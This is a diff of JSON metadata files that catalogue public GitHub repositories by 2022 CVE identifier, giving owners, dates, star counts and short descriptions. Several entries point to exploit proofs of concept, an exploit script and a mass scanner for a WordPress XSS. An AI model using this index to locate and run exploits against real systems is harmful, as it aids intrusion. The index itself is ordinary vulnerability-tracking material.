"2022-05-21T11:53:35Z", + "updated_at": "2022-05-21T11:53:35Z", + "pushed_at": "2022-05-21T11:53:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29006.json b/2022/CVE-2022-29006.json new file mode 100644 index 0000000000..f9456b6199 --- /dev/null +++ b/2022/CVE-2022-29006.json @@ -0,0 +1,33 @@ +[ + { + "id": 494769574, + "name": "CVE-2022-29006", + "full_name": "sudoninja-noob\/CVE-2022-29006", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-29006", + "description": null, + "fork": false, + "created_at": "2022-05-21T11:55:36Z", + "updated_at": "2022-05-21T11:55:36Z", + "pushed_at": "2022-05-21T11:55:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29007.json b/2022/CVE-2022-29007.json new file mode 100644 index 0000000000..40bf0cc7b5 --- /dev/null +++ b/2022/CVE-2022-29007.json @@ -0,0 +1,33 @@ +[ + { + "id": 494769906, + "name": "CVE-2022-29007", + "full_name": "sudoninja-noob\/CVE-2022-29007", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-29007", + "description": null, + "fork": false, + "created_at": "2022-05-21T11:57:04Z", + "updated_at": "2022-05-21T11:57:04Z", + "pushed_at": "2022-05-21T11:57:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29008.json b/2022/CVE-2022-29008.json new file mode 100644 index 0000000000..297d5226d8 --- /dev/null +++ b/2022/CVE-2022-29008.json @@ -0,0 +1,33 @@ +[ + { + "id": 494770190, + "name": "CVE-2022-29008", + "full_name": "sudoninja-noob\/CVE-2022-29008", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-29008", + "description": null, + "fork": false, + "created_at": "2022-05-21T11:58:26Z", + "updated_at": "2022-05-21T11:58:26Z", + "pushed_at": "2022-05-21T11:59:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29009.json b/2022/CVE-2022-29009.json new file mode 100644 index 0000000000..823384060c --- /dev/null +++ b/2022/CVE-2022-29009.json @@ -0,0 +1,33 @@ +[ + { + "id": 494770217, + "name": "CVE-2022-29009", + "full_name": "sudoninja-noob\/CVE-2022-29009", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-29009", + "description": null, + "fork": false, + "created_at": "2022-05-21T11:58:36Z", + "updated_at": "2022-05-21T11:58:36Z", + "pushed_at": "2022-05-21T11:59:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29063.json b/2022/CVE-2022-29063.json new file mode 100644 index 0000000000..f2d9e23e3c --- /dev/null +++ b/2022/CVE-2022-29063.json @@ -0,0 +1,40 @@ +[ + { + "id": 732796706, + "name": "CVE-2022-29063", + "full_name": "mbadanoiu\/CVE-2022-29063", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-29063", + "description": "CVE-2022-29063: Java Deserialization via RMI Connection in Apache OfBiz", + "fork": false, + "created_at": "2023-12-17T21:11:30Z", + "updated_at": "2024-03-05T06:22:06Z", + "pushed_at": "2023-12-17T21:22:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-29063", + "cves", + "deserialization", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29072.json b/2022/CVE-2022-29072.json new file mode 100644 index 0000000000..17a81f306c --- /dev/null +++ b/2022/CVE-2022-29072.json @@ -0,0 +1,161 @@ +[ + { + "id": 482104718, + "name": "CVE-2022-29072", + "full_name": "kagancapar\/CVE-2022-29072", + "owner": { + "login": "kagancapar", + "id": 33525376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33525376?v=4", + "html_url": "https:\/\/github.com\/kagancapar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kagancapar\/CVE-2022-29072", + "description": "7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.", + "fork": false, + "created_at": "2022-04-15T22:59:03Z", + "updated_at": "2024-11-16T18:03:07Z", + "pushed_at": "2022-04-22T11:26:31Z", + "stargazers_count": 685, + "watchers_count": 685, + "has_discussions": false, + "forks_count": 105, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 105, + "watchers": 685, + "score": 0, + "subscribers_count": 26 + }, + { + "id": 482929231, + "name": "CVE-2022-29072", + "full_name": "tiktb8\/CVE-2022-29072", + "owner": { + "login": "tiktb8", + "id": 13279083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13279083?v=4", + "html_url": "https:\/\/github.com\/tiktb8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tiktb8\/CVE-2022-29072", + "description": "Powershell to mitigate CVE-2022-29072", + "fork": false, + "created_at": "2022-04-18T17:08:43Z", + "updated_at": "2024-07-06T21:09:13Z", + "pushed_at": "2022-04-18T22:29:13Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 482962996, + "name": "CVE-2022-29072", + "full_name": "sentinelblue\/CVE-2022-29072", + "owner": { + "login": "sentinelblue", + "id": 70291995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70291995?v=4", + "html_url": "https:\/\/github.com\/sentinelblue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sentinelblue\/CVE-2022-29072", + "description": "** DISPUTED ** 7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process, NOTE: multiple third parties have reported that no privilege escalation can occur.", + "fork": false, + "created_at": "2022-04-18T18:59:01Z", + "updated_at": "2024-06-20T00:26:57Z", + "pushed_at": "2022-04-20T13:41:55Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "7zip", + "cve-2022-29072", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 580447745, + "name": "7-Zip.chm-Mitigation", + "full_name": "Phantomiman\/7-Zip.chm-Mitigation", + "owner": { + "login": "Phantomiman", + "id": 119011920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119011920?v=4", + "html_url": "https:\/\/github.com\/Phantomiman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phantomiman\/7-Zip.chm-Mitigation", + "description": "7-Zip CVE-2022-29072 Mitigation - CHM file - This script detects if the .chm file exists and removes it.", + "fork": false, + "created_at": "2022-12-20T15:30:12Z", + "updated_at": "2023-02-19T08:58:49Z", + "pushed_at": "2022-12-20T16:00:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798859541, + "name": "CVE-2022-29072", + "full_name": "rasan2001\/CVE-2022-29072", + "owner": { + "login": "rasan2001", + "id": 156652838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156652838?v=4", + "html_url": "https:\/\/github.com\/rasan2001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rasan2001\/CVE-2022-29072", + "description": null, + "fork": false, + "created_at": "2024-05-10T16:13:15Z", + "updated_at": "2024-05-10T16:13:36Z", + "pushed_at": "2024-05-10T16:13:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29078.json b/2022/CVE-2022-29078.json new file mode 100644 index 0000000000..cc66ce439b --- /dev/null +++ b/2022/CVE-2022-29078.json @@ -0,0 +1,101 @@ +[ + { + "id": 515929949, + "name": "CVE-2022-29078", + "full_name": "miko550\/CVE-2022-29078", + "owner": { + "login": "miko550", + "id": 83682793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4", + "html_url": "https:\/\/github.com\/miko550", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miko550\/CVE-2022-29078", + "description": "vuln ejs 3.1.6 docker", + "fork": false, + "created_at": "2022-07-20T10:10:01Z", + "updated_at": "2023-09-13T10:20:07Z", + "pushed_at": "2022-09-07T12:43:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 671189433, + "name": "expluatation_CVE-2022-29078", + "full_name": "liam-star-black-master\/expluatation_CVE-2022-29078", + "owner": { + "login": "liam-star-black-master", + "id": 75414361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75414361?v=4", + "html_url": "https:\/\/github.com\/liam-star-black-master", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liam-star-black-master\/expluatation_CVE-2022-29078", + "description": null, + "fork": false, + "created_at": "2023-07-26T18:42:09Z", + "updated_at": "2023-07-26T18:42:16Z", + "pushed_at": "2023-07-26T18:42:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 883535763, + "name": "CVE-2022-29078", + "full_name": "l0n3m4n\/CVE-2022-29078", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2022-29078", + "description": "Serverside Template Injection (SSTI) RCE - THM challenge \"whiterose\" ", + "fork": false, + "created_at": "2024-11-05T06:15:45Z", + "updated_at": "2024-11-08T14:00:47Z", + "pushed_at": "2024-11-08T14:00:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ctf", + "exploit", + "ssti", + "tryhackme", + "web-pentesting" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29154.json b/2022/CVE-2022-29154.json new file mode 100644 index 0000000000..b6c5af6aa0 --- /dev/null +++ b/2022/CVE-2022-29154.json @@ -0,0 +1,33 @@ +[ + { + "id": 536604298, + "name": "CVE-2022-29154", + "full_name": "EgeBalci\/CVE-2022-29154", + "owner": { + "login": "EgeBalci", + "id": 17179401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17179401?v=4", + "html_url": "https:\/\/github.com\/EgeBalci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EgeBalci\/CVE-2022-29154", + "description": "HIP2022 presentation materials.", + "fork": false, + "created_at": "2022-09-14T13:59:21Z", + "updated_at": "2024-09-24T16:59:18Z", + "pushed_at": "2022-09-14T14:19:43Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29170.json b/2022/CVE-2022-29170.json new file mode 100644 index 0000000000..3862cff212 --- /dev/null +++ b/2022/CVE-2022-29170.json @@ -0,0 +1,33 @@ +[ + { + "id": 594668634, + "name": "CVE-2022-29170", + "full_name": "yijikeji\/CVE-2022-29170", + "owner": { + "login": "yijikeji", + "id": 42433368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42433368?v=4", + "html_url": "https:\/\/github.com\/yijikeji", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yijikeji\/CVE-2022-29170", + "description": "Grafana is an open-source platform for monitoring and observability. In Grafana Enterprise, the Request security feature allows list allows to configure Grafana in a way so that the instance doesn’t call or only calls specific hosts. The vulnerability present starting with version 7.4.0-beta1 and prior to versions 7.5. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-29T09:10:44Z", + "updated_at": "2023-02-20T13:57:30Z", + "pushed_at": "2022-12-29T07:40:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29221.json b/2022/CVE-2022-29221.json new file mode 100644 index 0000000000..bd51db2d61 --- /dev/null +++ b/2022/CVE-2022-29221.json @@ -0,0 +1,33 @@ +[ + { + "id": 496102260, + "name": "CVE-2022-29221-PoC", + "full_name": "sbani\/CVE-2022-29221-PoC", + "owner": { + "login": "sbani", + "id": 3541652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3541652?v=4", + "html_url": "https:\/\/github.com\/sbani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sbani\/CVE-2022-29221-PoC", + "description": "CVE-2022-29221 Proof of Concept Code - Smarty RCE", + "fork": false, + "created_at": "2022-05-25T06:02:23Z", + "updated_at": "2024-08-04T18:35:37Z", + "pushed_at": "2022-05-25T07:11:59Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29303.json b/2022/CVE-2022-29303.json new file mode 100644 index 0000000000..fdc37b7b79 --- /dev/null +++ b/2022/CVE-2022-29303.json @@ -0,0 +1,64 @@ +[ + { + "id": 498521480, + "name": "CVE-2022-29303", + "full_name": "Chocapikk\/CVE-2022-29303", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-29303", + "description": "Python script to exploit CVE-2022-29303 ", + "fork": false, + "created_at": "2022-05-31T22:55:05Z", + "updated_at": "2024-08-12T20:23:44Z", + "pushed_at": "2022-05-31T23:10:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 498647437, + "name": "CVE-2022-29303", + "full_name": "1f3lse\/CVE-2022-29303", + "owner": { + "login": "1f3lse", + "id": 43382381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43382381?v=4", + "html_url": "https:\/\/github.com\/1f3lse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1f3lse\/CVE-2022-29303", + "description": "Python script to exploit CVE-2022-29303 ", + "fork": false, + "created_at": "2022-06-01T08:12:08Z", + "updated_at": "2022-05-31T22:57:51Z", + "pushed_at": "2022-05-31T23:10:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29337.json b/2022/CVE-2022-29337.json new file mode 100644 index 0000000000..6990b27c5b --- /dev/null +++ b/2022/CVE-2022-29337.json @@ -0,0 +1,33 @@ +[ + { + "id": 496233349, + "name": "CVE-2022-29337", + "full_name": "exploitwritter\/CVE-2022-29337", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-29337", + "description": "C-DATA FD702XW-X-R430 v2.1.13_X001 was discovered to contain a command injection vulnerability via the va_cmd parameter in formlanipv6. This vulnerability allows attackers to execute arbitrary commands via a crafted HTTP request.", + "fork": false, + "created_at": "2022-05-25T13:02:34Z", + "updated_at": "2022-06-07T08:51:46Z", + "pushed_at": "2022-05-25T13:05:06Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29359.json b/2022/CVE-2022-29359.json new file mode 100644 index 0000000000..d19099d1d9 --- /dev/null +++ b/2022/CVE-2022-29359.json @@ -0,0 +1,33 @@ +[ + { + "id": 480909851, + "name": "CVE-2022-29359", + "full_name": "ZSECURE\/CVE-2022-29359", + "owner": { + "login": "ZSECURE", + "id": 46941177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46941177?v=4", + "html_url": "https:\/\/github.com\/ZSECURE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZSECURE\/CVE-2022-29359", + "description": "CVE-2022-29359 - School Application System Stored Cross-Site Scripting", + "fork": false, + "created_at": "2022-04-12T17:30:18Z", + "updated_at": "2022-05-25T12:58:51Z", + "pushed_at": "2022-04-12T17:51:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29361.json b/2022/CVE-2022-29361.json new file mode 100644 index 0000000000..501fd2240b --- /dev/null +++ b/2022/CVE-2022-29361.json @@ -0,0 +1,64 @@ +[ + { + "id": 625487881, + "name": "Werkzeug-CVE-2022-29361-PoC", + "full_name": "kevin-mizu\/Werkzeug-CVE-2022-29361-PoC", + "owner": { + "login": "kevin-mizu", + "id": 48991194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48991194?v=4", + "html_url": "https:\/\/github.com\/kevin-mizu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kevin-mizu\/Werkzeug-CVE-2022-29361-PoC", + "description": null, + "fork": false, + "created_at": "2023-04-09T09:07:26Z", + "updated_at": "2024-01-16T14:16:06Z", + "pushed_at": "2023-04-09T16:02:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723368358, + "name": "CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS", + "full_name": "l3ragio\/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS", + "owner": { + "login": "l3ragio", + "id": 48380612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48380612?v=4", + "html_url": "https:\/\/github.com\/l3ragio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l3ragio\/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS", + "description": null, + "fork": false, + "created_at": "2023-11-25T12:56:50Z", + "updated_at": "2024-06-02T13:50:24Z", + "pushed_at": "2023-11-25T13:14:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29380.json b/2022/CVE-2022-29380.json new file mode 100644 index 0000000000..85b20d8ddb --- /dev/null +++ b/2022/CVE-2022-29380.json @@ -0,0 +1,33 @@ +[ + { + "id": 880923099, + "name": "CVE-2022-29380", + "full_name": "OpenXP-Research\/CVE-2022-29380", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2022-29380", + "description": "2022-29380", + "fork": false, + "created_at": "2024-10-30T15:50:46Z", + "updated_at": "2024-10-30T15:51:46Z", + "pushed_at": "2024-10-30T15:51:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29383.json b/2022/CVE-2022-29383.json new file mode 100644 index 0000000000..088994a0da --- /dev/null +++ b/2022/CVE-2022-29383.json @@ -0,0 +1,64 @@ +[ + { + "id": 440813827, + "name": "Netgear-ssl-vpn-20211222-CVE-2022-29383", + "full_name": "badboycxcc\/Netgear-ssl-vpn-20211222-CVE-2022-29383", + "owner": { + "login": "badboycxcc", + "id": 72059221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4", + "html_url": "https:\/\/github.com\/badboycxcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badboycxcc\/Netgear-ssl-vpn-20211222-CVE-2022-29383", + "description": null, + "fork": false, + "created_at": "2021-12-22T10:06:59Z", + "updated_at": "2024-08-12T20:19:07Z", + "pushed_at": "2022-05-14T06:21:21Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 441898482, + "name": "netgear-to-CVE-2022-29383", + "full_name": "cxaqhq\/netgear-to-CVE-2022-29383", + "owner": { + "login": "cxaqhq", + "id": 32918546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918546?v=4", + "html_url": "https:\/\/github.com\/cxaqhq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxaqhq\/netgear-to-CVE-2022-29383", + "description": null, + "fork": false, + "created_at": "2021-12-26T13:33:16Z", + "updated_at": "2022-05-14T06:31:46Z", + "pushed_at": "2022-05-14T06:30:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29455.json b/2022/CVE-2022-29455.json new file mode 100644 index 0000000000..9f23b85a37 --- /dev/null +++ b/2022/CVE-2022-29455.json @@ -0,0 +1,188 @@ +[ + { + "id": 507415631, + "name": "Wordpress_xss-CVE-2022-29455", + "full_name": "GULL2100\/Wordpress_xss-CVE-2022-29455", + "owner": { + "login": "GULL2100", + "id": 62743301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62743301?v=4", + "html_url": "https:\/\/github.com\/GULL2100", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GULL2100\/Wordpress_xss-CVE-2022-29455", + "description": null, + "fork": false, + "created_at": "2022-06-25T20:57:55Z", + "updated_at": "2023-02-08T08:29:03Z", + "pushed_at": "2022-07-05T15:25:06Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 532884056, + "name": "CVE-2022-29455", + "full_name": "akhilkoradiya\/CVE-2022-29455", + "owner": { + "login": "akhilkoradiya", + "id": 102510716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102510716?v=4", + "html_url": "https:\/\/github.com\/akhilkoradiya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akhilkoradiya\/CVE-2022-29455", + "description": "Wordpress Vulnerability - XSS ( Cross-Site Scripting )", + "fork": false, + "created_at": "2022-09-05T12:08:50Z", + "updated_at": "2024-07-29T13:14:34Z", + "pushed_at": "2022-09-05T12:21:59Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 585658055, + "name": "CVE-2022-29455", + "full_name": "yaudahbanh\/CVE-2022-29455", + "owner": { + "login": "yaudahbanh", + "id": 39010800, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39010800?v=4", + "html_url": "https:\/\/github.com\/yaudahbanh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaudahbanh\/CVE-2022-29455", + "description": "Mass Scanner for CVE-2022-29455 on Elementor Plugins Wordpress", + "fork": false, + "created_at": "2023-01-05T18:29:47Z", + "updated_at": "2023-03-22T08:09:03Z", + "pushed_at": "2023-01-05T18:30:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 600651739, + "name": "CVE-2022-29455", + "full_name": "0xc4t\/CVE-2022-29455", + "owner": { + "login": "0xc4t", + "id": 105418279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105418279?v=4", + "html_url": "https:\/\/github.com\/0xc4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xc4t\/CVE-2022-29455", + "description": "CVE-2022-29455", + "fork": false, + "created_at": "2023-02-12T06:26:11Z", + "updated_at": "2023-02-27T14:55:17Z", + "pushed_at": "2023-02-24T13:43:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647997479, + "name": 